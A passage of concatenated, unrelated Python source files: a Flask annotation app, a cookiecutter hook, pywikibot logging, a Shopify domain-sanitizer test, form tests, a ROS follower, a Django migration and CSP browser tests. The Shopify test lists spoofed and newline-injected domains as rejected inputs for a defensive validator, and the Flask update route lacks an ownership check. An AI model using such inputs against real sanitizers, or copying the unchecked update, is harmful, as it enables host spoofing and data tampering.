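# containing a data URL such as 'data:image/jpeg;base64,/9j/4AAQ...'; the code
# above strips everything up to the first comma before decoding the base64
# payload and writing it to disk.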
# Page for users to annotate photos
@app.route('/annotate/', methods=['GET'])
def annotate():
if 'username' not in session:
return redirect(url_for('login'))
id_food = request.args.get('id_food')
db = get_db()
if id_food == None:
food = db.execute('SELECT * FROM food WHERE annotation="" AND trackperson=? ORDER BY id_food DESC LIMIT 1', [session['user_id']]).fetchone()
else:
food = db.execute('SELECT * FROM food WHERE id_food=? AND trackperson=? ORDER BY id_food DESC LIMIT 1', [id_food, session['user_id']]).fetchone()
if food == None:
return render_template('annotate.htm', no_pictures=True)
food = dict(food)
food['user'] = session['username']
return render_template('annotate.htm', **food)
# Page To Save annotations
@app.route('/annotate/', methods=['POST'])
def save_annotation():
if 'username' not in session:
return redirect(url_for('login'))
id_food = request.form['id_food']
annotation = request.form['annotation']
db = get_db()
db.execute('UPDATE food SET annotation=? WHERE id_food=?',
[annotation, id_food])
db.commit()
return redirect(url_for('annotate'))
@app.route("/wellness", methods=['GET'])
def wellness():
if 'username' not in session:
return redirect(url_for('login'))
return render_template('wellness.htm')
@app.route("/wellness", methods=['POST'])
def add_wellness():
if 'username' not in session:
return redirect(url_for('login'))
return redirect(url_for('add_wellness'))
# Page for users to see their history
@app.route('/history/')
def history():
if 'username' not in session:
return redirect(url_for('login'))
user_id = str(session['user_id'])
db = get_db()
cur = db.execute('SELECT * FROM food WHERE trackperson=? ORDER BY id_food', [user_id])
entries = cur.fetchall()
return render_template('history.htm', entries=entries)
@app.route("/delete/")
def delete():
if 'username' not in session:
return redirect(url_for('login'))
id_food = request.args.get('id_food')
user_id = session['user_id']
db = get_db()
db.execute('DELETE FROM food WHERE id_food=? AND trackperson=?', [id_food, user_id])
db.commit()
return redirect(url_for('history'))
if __name__ == "__main__":
init_db()
app.run(debug=True, host='0.0.0.0', port=9001)
|
almlab/microbiome-tracker
|
src/serve.py
|
Python
|
mit
| 6,821
|
#!/usr/bin/env python
import os
import shutil
import datetime
from pathlib import Path
PROJECT_DIRECTORY = os.path.realpath(os.path.curdir)
def remove_file(filepath):
f = Path(PROJECT_DIRECTORY) / filepath
if f.is_dir():
shutil.rmtree(str(f))
else:
f.unlink()
def replace_contents(filename, what, replacement):
with filename.open() as fh:
changelog = fh.read()
with filename.open('w') as fh:
fh.write(changelog.replace(what, replacement))
def copytree(src, dst, symlinks=False, ignore=None):
if not os.path.exists(dst):
os.makedirs(dst)
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if os.path.isdir(s):
copytree(s, d, symlinks, ignore)
else:
if (not os.path.exists(d) or
os.stat(s).st_mtime - os.stat(d).st_mtime > 1):
shutil.copy2(s, d)
if __name__ == "__main__":
today = datetime.date.today()
if '{{ cookiecutter.use_github }}' == 'yes':
remove_file('.hgignore')
if not Path(".git").exists():
os.system("git init .")
shutil.move("git-commit-msg", ".git/hooks/commit-msg")
else:
remove_file('.gitignore')
remove_file('git-commit-msg')
for path in [Path("HISTORY.rst"),
Path('{{ cookiecutter.py_module }}') / "__about__.py",
Path('docs') / 'conf.py',
]:
replace_contents(path, '<TODAY>', today.strftime("%Y-%m-%d"))
replace_contents(path, '<YEAR>', today.strftime("%Y"))
tox_envlist = []
for py, on in [("py26", "{{ cookiecutter.py26 }}"),
("py27", "{{ cookiecutter.py27 }}"),
("py33", "{{ cookiecutter.py33 }}"),
("py34", "{{ cookiecutter.py34 }}"),
("py35", "{{ cookiecutter.py35 }}"),
("py36", "{{ cookiecutter.py36 }}"),
("py37", "{{ cookiecutter.py37 }}"),
("pypy", "{{ cookiecutter.pypy }}"),
("pypy3", "{{ cookiecutter.pypy3 }}"),
]:
if on == "yes":
tox_envlist.append(py)
replace_contents(Path("tox.ini"), '@TOX_ENVLIST@',
", ".join(tox_envlist))
if '{{ cookiecutter.use_travis_ci }}' == 'no':
remove_file('.travis.yml')
if '{{ cookiecutter.use_pypi_deployment_with_travis }}' == 'no':
remove_file('travis_pypi_setup.py')
if '{{ cookiecutter.use_paver }}' == 'no':
remove_file('pavement.py')
if '{{ cookiecutter.use_make }}' == 'no':
remove_file('Makefile')
for f in Path("licenses").iterdir():
f.unlink()
Path("licenses").rmdir()
if "{{ cookiecutter.src_dir }}" != ".":
src_d = Path("{{ cookiecutter.src_dir}}")
if not src_d.exists():
src_d.mkdir(parents=True)
copytree("{{ cookiecutter.py_module }}",
str(src_d / "{{ cookiecutter.py_module }}"))
copytree("tests", str(src_d / "tests"))
shutil.rmtree("{{ cookiecutter.py_module }}")
shutil.rmtree("tests")
domain = "{{ cookiecutter.gettext_domain }}"
if domain == "None":
shutil.rmtree("locale")
else:
gk = Path("locale/.gitkeep")
if gk.exists():
gk.unlink()
if '{{ cookiecutter.add_docs }}' == 'no':
remove_file('docs')
if '{{ cookiecutter.requirements_yaml }}' == 'no':
remove_file('requirements')
|
nicfit/nicfit.py
|
cookiecutter/hooks/post_gen_project.py
|
Python
|
mit
| 3,552
|
# -*- coding: utf-8 -*-
"""Logging functions."""
#
# (C) Pywikibot team, 2010-2020
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import logging
import os
import sys
# logging levels
from logging import DEBUG, INFO, WARNING, ERROR, CRITICAL, StreamHandler
STDOUT = 16
VERBOSE = 18
INPUT = 25
if sys.version_info[0] > 2:
unicode = str
_init_routines = []
_inited_routines = set()
def add_init_routine(routine):
"""Add a routine to be run as soon as possible."""
_init_routines.append(routine)
def _init():
"""Init any routines which have not already been called."""
for init_routine in _init_routines:
if init_routine not in _inited_routines:
init_routine()
_inited_routines.add(init_routine)
# Clear the list of routines to be inited
_init_routines[:] = [] # the global variable is used with slice operator
# User output/logging functions
# Six output functions are defined. Each requires a unicode or string
# argument. All of these functions generate a message to the log file if
# logging is enabled ("-log" or "-debug" command line arguments).
# The functions output(), stdout(), warning(), and error() all display a
# message to the user through the logger object; the only difference is the
# priority level, which can be used by the application layer to alter the
# display. The stdout() function should be used only for data that is
# the "result" of a script, as opposed to information messages to the
# user.
# The function log() by default does not display a message to the user, but
# this can be altered by using the "-verbose" command line option.
# The function debug() only logs its messages, they are never displayed on
# the user console. debug() takes a required second argument, which is a
# string indicating the debugging layer.
def logoutput(text, decoder=None, newline=True, _level=INFO, _logger='',
**kwargs):
"""Format output and send to the logging module.
Helper function used by all the user-output convenience functions.
"""
if _logger:
logger = logging.getLogger('pywiki.' + _logger)
else:
logger = logging.getLogger('pywiki')
if not logger.handlers: # lastResort for Python 2 (T188417)
logger.handlers.append(StreamHandler())
# invoke any init routines
if _init_routines:
_init()
# frame 0 is logoutput() in this module,
# frame 1 is the convenience function (output(), etc.)
# frame 2 is whatever called the convenience function
frame = sys._getframe(2)
module = os.path.basename(frame.f_code.co_filename)
context = {'caller_name': frame.f_code.co_name,
'caller_file': module,
'caller_line': frame.f_lineno,
'newline': ('\n' if newline else '')}
if decoder:
text = text.decode(decoder)
elif not isinstance(text, unicode):
if not isinstance(text, str):
# looks like text is a non-text object.
# Maybe it has a __unicode__ builtin ?
# (allows to print Page, Site...)
text = unicode(text)
else:
try:
text = text.decode('utf-8')
except UnicodeDecodeError:
text = text.decode('iso8859-1')
logger.log(_level, text, extra=context, **kwargs)
def output(text, decoder=None, newline=True, toStdout=False, **kwargs):
r"""Output a message to the user via the userinterface.
Works like print, but uses the encoding used by the user's console
(console_encoding in the configuration file) instead of ASCII.
If decoder is None, text should be a unicode string. Otherwise it
should be encoded in the given encoding.
If newline is True, a line feed will be added after printing the text.
If toStdout is True, the text will be sent to standard output,
so that it can be piped to another process. All other text will
be sent to stderr. See: https://en.wikipedia.org/wiki/Pipeline_%28Unix%29
text can contain special sequences to create colored output. These
consist of the escape character \03 and the color name in curly braces,
e. g. \03{lightpurple}. \03{default} resets the color. By using the
color_format method from pywikibot.tools.formatter, the escape character
may be omitted.
Other keyword arguments are passed unchanged to the logger; so far, the
only argument that is useful is "exc_info=True", which causes the
log message to include an exception traceback.
"""
    if toStdout:  # maintained for backwards-compatibility only
from pywikibot.tools import issue_deprecation_warning
issue_deprecation_warning('"toStdout" parameter',
'pywikibot.stdout()', since='20160228')
logoutput(text, decoder, newline, STDOUT, **kwargs)
else:
logoutput(text, decoder, newline, INFO, **kwargs)
def stdout(text, decoder=None, newline=True, **kwargs):
"""Output script results to the user via the userinterface."""
logoutput(text, decoder, newline, STDOUT, **kwargs)
def warning(text, decoder=None, newline=True, **kwargs):
"""Output a warning message to the user via the userinterface.
@param text: the message the user wants to display.
@type text: str
@param decoder: If None, text should be a unicode string. Otherwise it
should be encoded in the given encoding.
@type decoder: str
@param newline: If True, a line feed will be added after printing the text.
@type newline: bool
@param kwargs: The keyword arguments can be found in the python doc:
https://docs.python.org/3/howto/logging-cookbook.html.
"""
logoutput(text, decoder, newline, WARNING, **kwargs)
def error(text, decoder=None, newline=True, **kwargs):
"""Output an error message to the user via the userinterface."""
logoutput(text, decoder, newline, ERROR, **kwargs)
def log(text, decoder=None, newline=True, **kwargs):
"""Output a record to the log file."""
logoutput(text, decoder, newline, VERBOSE, **kwargs)
def critical(text, decoder=None, newline=True, **kwargs):
"""Output a critical record to the user via the userinterface."""
logoutput(text, decoder, newline, CRITICAL, **kwargs)
def debug(text, layer, decoder=None, newline=True, **kwargs):
"""Output a debug record to the log file.
@param layer: The name of the logger that text will be sent to.
"""
logoutput(text, decoder, newline, DEBUG, layer, **kwargs)
def exception(msg=None, decoder=None, newline=True, tb=False, **kwargs):
"""Output an error traceback to the user via the userinterface.
Use directly after an 'except' statement::
...
except Exception:
pywikibot.exception()
...
or alternatively::
...
except Exception as e:
pywikibot.exception(e)
...
@param tb: Set to True in order to output traceback also.
"""
if isinstance(msg, BaseException):
exc_info = 1
else:
exc_info = sys.exc_info()
msg = '%s: %s' % (
repr(exc_info[1]).split('(')[0], unicode(exc_info[1]).strip())
if tb:
kwargs['exc_info'] = exc_info
logoutput(msg, decoder, newline, ERROR, **kwargs)
|
PersianWikipedia/pywikibot-core
|
pywikibot/logging.py
|
Python
|
mit
| 7,378
|
from shopify.utils import shop_url
from test.test_helper import TestCase
class TestSanitizeShopDomain(TestCase):
def test_returns_hostname_for_good_shop_domains(self):
good_shop_domains = [
"my-shop",
"my-shop.myshopify.com",
"http://my-shop.myshopify.com",
"https://my-shop.myshopify.com",
]
sanitized_shops = [shop_url.sanitize_shop_domain(shop_domain) for shop_domain in good_shop_domains]
self.assertTrue(all(shop == "my-shop.myshopify.com" for shop in sanitized_shops))
def test_returns_none_for_bad_shop_domains(self):
bad_shop_domains = [
"myshop.com",
"myshopify.com",
"shopify.com",
"two words",
"store.myshopify.com.evil.com",
"/foo/bar",
"/foo.myshopify.io.evil.ru",
"%0a123.myshopify.io ",
"foo.bar.myshopify.io",
]
sanitized_shops = [shop_url.sanitize_shop_domain(shop_domain) for shop_domain in bad_shop_domains]
self.assertTrue(all(shop_domain is None for shop_domain in sanitized_shops))
def test_returns_hostname_for_custom_shop_domains(self):
custom_shop_domains = [
"my-shop",
"my-shop.myshopify.io",
"http://my-shop.myshopify.io",
"https://my-shop.myshopify.io",
]
sanitized_shops = [
shop_url.sanitize_shop_domain(shop_domain, "myshopify.io") for shop_domain in custom_shop_domains
]
self.assertTrue(all(shop == "my-shop.myshopify.io" for shop in sanitized_shops))
def test_returns_none_for_none_type(self):
self.assertIsNone(shop_url.sanitize_shop_domain(None))
|
Shopify/shopify_python_api
|
test/utils/shop_url_test.py
|
Python
|
mit
| 1,736
|
from tovendendo.users.forms import LoginForm, RegistrationForm
from werkzeug.datastructures import MultiDict
import pytest
def test_allows_login_with_valid_data(user):
data = MultiDict({'email': 'user@email.com', 'password': 'pas'})
form = LoginForm(data)
assert form.validate()
@pytest.mark.parametrize('email,password', [
('', ''),
(None, None)
])
def test_login_when_form_is_invalid(email, password):
form = LoginForm(email=email, password=password)
assert not form.validate()
def test_allows_registration_with_valid_data(session):
data = MultiDict({
'name': 'Harry Poter',
'email': 'harry@poter.com',
'password': '4321',
'phone_number': '43112345'})
form = RegistrationForm(data)
assert form.validate()
@pytest.mark.parametrize('name,email,password,phone_number', [
('', '', '', ''),
(None, None, None, None)
])
def test_registration_when_form_is_invalid(name, email, password, phone_number, session):
data = MultiDict({
        'name': name,
        'email': email,
        'password': password,
        'phone_number': phone_number})
form = RegistrationForm(data)
assert not form.validate()
def test_denied_registration_with_already_registered_email(user, session):
data = MultiDict({
'name': 'Harry Poter',
'email': user.email,
'password': '4321',
'phone_number': user.phone_number})
form = RegistrationForm(data)
assert not form.validate()
def test_denied_registration_with_already_registered_phone_number(user, session):
data = MultiDict({
'name': 'Harry Poter',
'email': 'user@email.com',
'password': '4321',
'phone_number': user.phone_number})
form = RegistrationForm(data)
assert not form.validate()
|
anapaulagomes/to-vendendo
|
tests/users/test_form.py
|
Python
|
mit
| 2,003
|
#!/usr/bin/env python
"""
ar_follower.py - Version 1.0 2013-08-25
Follow an AR tag published on the /ar_pose_marker topic. The /ar_pose_marker topic
is published by the ar_track_alvar package
Created for the Pi Robot Project: http://www.pirobot.org
Copyright (c) 2013 Patrick Goebel. All rights reserved.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details at:
http://www.gnu.org/licenses/gpl.html
"""
import rospy
from ar_track_alvar.msg import AlvarMarkers
from geometry_msgs.msg import Twist
from math import copysign
class ARFollower():
def __init__(self):
rospy.init_node("ar_follower")
# Set the shutdown function (stop the robot)
rospy.on_shutdown(self.shutdown)
# How often should we update the robot's motion?
self.rate = rospy.get_param("~rate", 10)
r = rospy.Rate(self.rate)
# The maximum rotation speed in radians per second
self.max_angular_speed = rospy.get_param("~max_angular_speed", 2.0)
# The minimum rotation speed in radians per second
self.min_angular_speed = rospy.get_param("~min_angular_speed", 0.5)
# The maximum distance a target can be from the robot for us to track
self.max_x = rospy.get_param("~max_x", 20.0)
# The goal distance (in meters) to keep between the robot and the marker
self.goal_x = rospy.get_param("~goal_x", 0.6)
# How far away from the goal distance (in meters) before the robot reacts
self.x_threshold = rospy.get_param("~x_threshold", 0.05)
# How far away from being centered (y displacement) on the AR marker
# before the robot reacts (units are meters)
self.y_threshold = rospy.get_param("~y_threshold", 0.05)
# How much do we weight the goal distance (x) when making a movement
self.x_scale = rospy.get_param("~x_scale", 0.5)
# How much do we weight y-displacement when making a movement
self.y_scale = rospy.get_param("~y_scale", 1.0)
# The max linear speed in meters per second
self.max_linear_speed = rospy.get_param("~max_linear_speed", 0.3)
# The minimum linear speed in meters per second
self.min_linear_speed = rospy.get_param("~min_linear_speed", 0.1)
# Publisher to control the robot's movement
self.cmd_vel_pub = rospy.Publisher('cmd_vel', Twist)
        # Initialize the movement command
self.move_cmd = Twist()
# Set flag to indicate when the AR marker is visible
self.target_visible = False
# Wait for the ar_pose_marker topic to become available
rospy.loginfo("Waiting for ar_pose_marker topic...")
rospy.wait_for_message('ar_pose_marker', AlvarMarkers)
# Subscribe to the ar_pose_marker topic to get the image width and height
rospy.Subscriber('ar_pose_marker', AlvarMarkers, self.set_cmd_vel)
rospy.loginfo("Marker messages detected. Starting follower...")
# Begin the cmd_vel publishing loop
while not rospy.is_shutdown():
# Send the Twist command to the robot
self.cmd_vel_pub.publish(self.move_cmd)
# Sleep for 1/self.rate seconds
r.sleep()
def set_cmd_vel(self, msg):
# Pick off the first marker (in case there is more than one)
try:
marker = msg.markers[0]
if not self.target_visible:
rospy.loginfo("FOLLOWER is Tracking Target!")
self.target_visible = True
        except IndexError:
            # If the target is lost, stop the robot by slowing it down incrementally
self.move_cmd.linear.x /= 1.5
self.move_cmd.angular.z /= 1.5
if self.target_visible:
rospy.loginfo("FOLLOWER LOST Target!")
self.target_visible = False
return
# Get the displacement of the marker relative to the base
target_offset_y = marker.pose.pose.position.y
# Get the distance of the marker from the base
target_offset_x = marker.pose.pose.position.x
# Rotate the robot only if the displacement of the target exceeds the threshold
if abs(target_offset_y) > self.y_threshold:
# Set the rotation speed proportional to the displacement of the target
speed = target_offset_y * self.y_scale
self.move_cmd.angular.z = copysign(max(self.min_angular_speed,
min(self.max_angular_speed, abs(speed))), speed)
else:
self.move_cmd.angular.z = 0.0
# Now get the linear speed
if abs(target_offset_x - self.goal_x) > self.x_threshold:
speed = (target_offset_x - self.goal_x) * self.x_scale
if speed < 0:
speed *= 1.5
self.move_cmd.linear.x = copysign(min(self.max_linear_speed, max(self.min_linear_speed, abs(speed))), speed)
else:
self.move_cmd.linear.x = 0.0
def shutdown(self):
rospy.loginfo("Stopping the robot...")
self.cmd_vel_pub.publish(Twist())
rospy.sleep(1)
if __name__ == '__main__':
try:
ARFollower()
rospy.spin()
except rospy.ROSInterruptException:
rospy.loginfo("AR follower node terminated.")
|
fujy/ROS-Project
|
src/rbx2/rbx2_ar_tags/nodes/ar_follower.py
|
Python
|
mit
| 5,999
|
from Bio.Phylo.Applications import PhymlCommandline
import sys
from OrthoEvol.Tools.logit import LogIt
class PhyML(object):
"""The PhyML class uses Biopython's PhyMLCommandline wrapper to generate trees
from the PhyML executable."""
def __init__(self, phyml_input, datatype='aa'):
"""Run phyml to generate tree results.
If you're using Linux, ensure that your phyml path is set in your bash
profile. If you're using Windows, this function will look for the name
of the executable 'PhyML-3.1_win32.exe'.
"""
self.phyml_log = LogIt().default(logname="GenBank", logfile=None)
# Use the phyml executable file
phyml_exe = None
# This is mainly intended for windows use or use with an executable
# file
win32 = "win32"
executable = "PhyML-3.1_win32.exe"
exe_name = executable if sys.platform == win32 else "phyml"
phyml_exe = exe_name
self.phyml_exe = phyml_exe
self.datatype = datatype
self.phyml_input = phyml_input
self._runphyml()
def _runphyml(self):
""""Run phyml.
Input a phylip formatted alignment file and describe the datatype
('nt' or 'aa').
"""
run_phyml = PhymlCommandline(self.phyml_exe,
input=self.phyml_input,
datatype=self.datatype)
out_log, err_log = run_phyml()
self.phyml_log(out_log)
self.phyml_log(err_log)
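# Illustrative usage (a minimal sketch; the alignment filename is hypothetical and
# assumes a PHYLIP-formatted file plus a phyml executable available on the PATH):
#
#     PhyML("alignment.phy", datatype="nt")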
|
datasnakes/Datasnakes-Scripts
|
OrthoEvol/Orthologs/Phylogenetics/PhyML/orthophyml.py
|
Python
|
mit
| 1,577
|
# -*- coding: utf-8 -*-
"""
Defines views.
"""
import calendar
from flask import redirect, render_template, url_for, make_response, abort
from jinja2 import TemplateNotFound
from presence_analyzer.main import app
from presence_analyzer.utils import (jsonify, get_data, mean,
group_by_weekday,
group_by_weekday_start_end)
import logging
log = logging.getLogger(__name__) # pylint: disable-msg=C0103
@app.route('/')
@app.route('/<name>')
def mainpage(name=None):
"""
Redirects to default front page if name equals None or return render
template from templates directory.
"""
if not name:
return redirect(url_for('mainpage', name='presence_weekday.html'))
try:
return render_template(name)
except TemplateNotFound:
return make_response('Not Found', 404)
@app.route('/api/v1/users', methods=['GET'])
@jsonify
def users_view():
"""
Users listing for dropdown.
"""
data = get_data()
return [{'user_id': i, 'name': 'User {0}'.format(str(i))}
for i in data.keys()]
@app.route('/api/v1/mean_time_weekday/', methods=['GET'])
@app.route('/api/v1/mean_time_weekday/<int:user_id>', methods=['GET'])
@jsonify
def mean_time_weekday_view(user_id=None):
"""
Returns mean presence time of given user grouped by weekday.
"""
data = get_data()
if not user_id:
        abort(400)
if user_id not in data:
log.debug('User %s not found!', user_id)
return []
weekdays = group_by_weekday(data[user_id])
result = [(calendar.day_abbr[weekday], mean(intervals))
for weekday, intervals in weekdays.items()]
return result
@app.route('/api/v1/presence_weekday/', methods=['GET'])
@app.route('/api/v1/presence_weekday/<int:user_id>', methods=['GET'])
@jsonify
def presence_weekday_view(user_id=None):
"""
Returns total presence time of given user grouped by weekday.
"""
data = get_data()
if not user_id:
        abort(400)
if user_id not in data:
log.debug('User %s not found!', user_id)
return []
weekdays = group_by_weekday(data[user_id])
result = [(calendar.day_abbr[weekday], sum(intervals))
for weekday, intervals in weekdays.items()]
result.insert(0, ('Weekday', 'Presence (s)'))
return result
@app.route('/api/v1/presence_start_end/', methods=['GET'])
@app.route('/api/v1/presence_start_end/<int:user_id>', methods=['GET'])
@jsonify
def presence_start_end_view(user_id=None):
"""
    Returns mean start and end times of presence of given user grouped by weekday.
"""
data = get_data()
if not user_id:
        abort(400)
if user_id not in data:
log.debug('User %s not found!', user_id)
return []
weekdays = group_by_weekday_start_end(data[user_id])
result = [(calendar.day_abbr[weekday], value[0], value[1])
for weekday, value in weekdays.items()]
return result
|
aadamski/presence-analyzer-aadamski
|
src/presence_analyzer/views.py
|
Python
|
mit
| 3,013
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-05-05 20:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CategoryStatusCount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
('total', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'category_status_count',
'managed': False,
},
),
migrations.CreateModel(
name='CategoryStatusPercent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'category_status_percent',
'managed': False,
},
),
migrations.CreateModel(
name='CountryStatusCount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('country', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
('total', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'country_status_count',
'managed': False,
},
),
migrations.CreateModel(
name='CountryStatusPercent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('country', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'country_status_percent',
'managed': False,
},
),
migrations.CreateModel(
name='Kickstarter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.TextField(blank=True, null=True)),
('disable_communication', models.TextField(blank=True, null=True)),
('location_type', models.TextField(blank=True, null=True)),
('category_parent_id', models.IntegerField(blank=True, null=True)),
('sub_category', models.TextField(blank=True, null=True)),
('usd_pledged', models.TextField(blank=True, null=True)),
('launched_at', models.TextField(blank=True, null=True)),
('category_slug', models.TextField(blank=True, null=True)),
('currency', models.TextField(blank=True, null=True)),
('deadline', models.TextField(blank=True, null=True)),
('spotlight', models.TextField(blank=True, null=True)),
('currency_trailing_code', models.TextField(blank=True, null=True)),
('displayable_name', models.TextField(blank=True, null=True)),
('state_changed_at', models.TextField(blank=True, null=True)),
('goal', models.TextField(blank=True, null=True)),
('category', models.TextField(blank=True, null=True)),
('city', models.TextField(blank=True, null=True)),
('name', models.TextField(blank=True, null=True)),
('creator_name', models.TextField(blank=True, null=True)),
('staff_pick', models.TextField(blank=True, null=True)),
('country', models.TextField(blank=True, null=True)),
('pledged', models.TextField(blank=True, null=True)),
('creator', models.TextField(blank=True, null=True)),
('location_code', models.TextField(blank=True, null=True)),
('slug', models.TextField(blank=True, null=True)),
('state', models.TextField(blank=True, null=True)),
('static_usd_rate', models.TextField(blank=True, null=True)),
('location', models.TextField(blank=True, null=True)),
('backers_count', models.TextField(blank=True, null=True)),
('currency_symbol', models.TextField(blank=True, null=True)),
('category_id', models.IntegerField(blank=True, null=True)),
('created_at', models.TextField(blank=True, null=True)),
('blurb', models.TextField(blank=True, null=True)),
('category_position', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'ks_project',
'managed': False,
},
),
migrations.CreateModel(
name='MonthStatusCount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('month', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
('total', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'monthly_status_count',
'managed': False,
},
),
migrations.CreateModel(
name='MonthStatusPercent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('month', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'monthly_status_percent',
'managed': False,
},
),
migrations.CreateModel(
name='Projects',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(blank=True, null=True)),
('creator_name', models.TextField(blank=True, null=True)),
('blurb', models.TextField(blank=True, null=True)),
('backers_count', models.TextField(blank=True, null=True)),
('goal', models.TextField(blank=True, null=True)),
('pledged', models.TextField(blank=True, null=True)),
('percent_of_goal', models.TextField(blank=True, null=True)),
('status', models.TextField(blank=True, null=True)),
('category', models.TextField(blank=True, null=True)),
('sub_category', models.TextField(blank=True, null=True)),
('launched_at', models.DateTimeField(blank=True, null=True)),
('deadline', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, null=True)),
('location', models.TextField(blank=True, null=True)),
('country', models.TextField(blank=True, null=True)),
('state', models.TextField(blank=True, null=True)),
('city', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'projects',
'managed': False,
},
),
migrations.CreateModel(
name='SubCategoryStatusCount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sub_category', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
('total', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'sub_category_status_count',
'managed': False,
},
),
migrations.CreateModel(
name='SubCategoryStatusPercent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sub_category', models.TextField(blank=True, null=True)),
('canceled', models.IntegerField(blank=True, null=True)),
('failed', models.IntegerField(blank=True, null=True)),
('live', models.IntegerField(blank=True, null=True)),
('successful', models.IntegerField(blank=True, null=True)),
('suspended', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'sub_category_status_percent',
'managed': False,
},
),
]
|
pratyaymodi/kickstarter
|
kickstarter_django/kickstarter/migrations/0001_initial.py
|
Python
|
mit
| 11,349
|
import _plotly_utils.basevalidators
class CustomdataValidator(_plotly_utils.basevalidators.DataArrayValidator):
def __init__(
self, plotly_name="customdata", parent_name="choroplethmapbox", **kwargs
):
super(CustomdataValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "data"),
**kwargs
)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/choroplethmapbox/_customdata.py
|
Python
|
mit
| 476
|
import pytest
from utils.page_model import TestResultPage
from utils.config import config
from tests.common import generate_test_url
UNALLOWED_PORT = config['server_port'] + 1
SAME_ORIGIN = 'http://' + config['server_address'] + ':' + str(config['server_port'])
DIFFERENT_ORIGIN = 'http://' + config['server_address'] + ':' + str(UNALLOWED_PORT)
def test_iframe_ancestors_origin_allowed(browser):
"""
    Test that the iframe is loaded if the CSP directive frame-ancestors allows
    the origin which is trying to load it
e.g. if base page is http://127.0.0.1:8000 and it loads iFrame
which has CSP directive frame-ancestors http://127.0.0.1:8000
"""
policy = "frame-ancestors {0}".format(SAME_ORIGIN)
params = "iframe=true"
url = generate_test_url(policy, header=True, meta=False, allow=True,
fixture_url='frame-ancestors', params=params)
page = TestResultPage(browser).open(url)
res = page.get_test_results()
assert (res == 'Pass')
def test_iframe_ancestors_origin_unallowed(browser):
"""
    Test that the iframe is blocked if the CSP directive frame-ancestors does not
    allow the origin which is trying to load it,
    e.g. if the base page is http://127.0.0.1:8000 and it loads an iFrame
    which has the CSP directive frame-ancestors http://127.0.0.1:8001,
    then, since the frame-ancestors directive has a different origin (port),
    the iFrame shouldn't be allowed to load
"""
policy = "frame-ancestors {0}".format(DIFFERENT_ORIGIN)
params = "iframe=true"
url = generate_test_url(policy, header=True, meta=False, allow=False,
fixture_url='frame-ancestors', params=params)
page = TestResultPage(browser).open(url)
res = page.get_test_results()
assert (res == 'Pass')
|
ilyanesterov/browser-csp-compatibility
|
tests/frame-ancestors/test_frame_ancestors_iframe.py
|
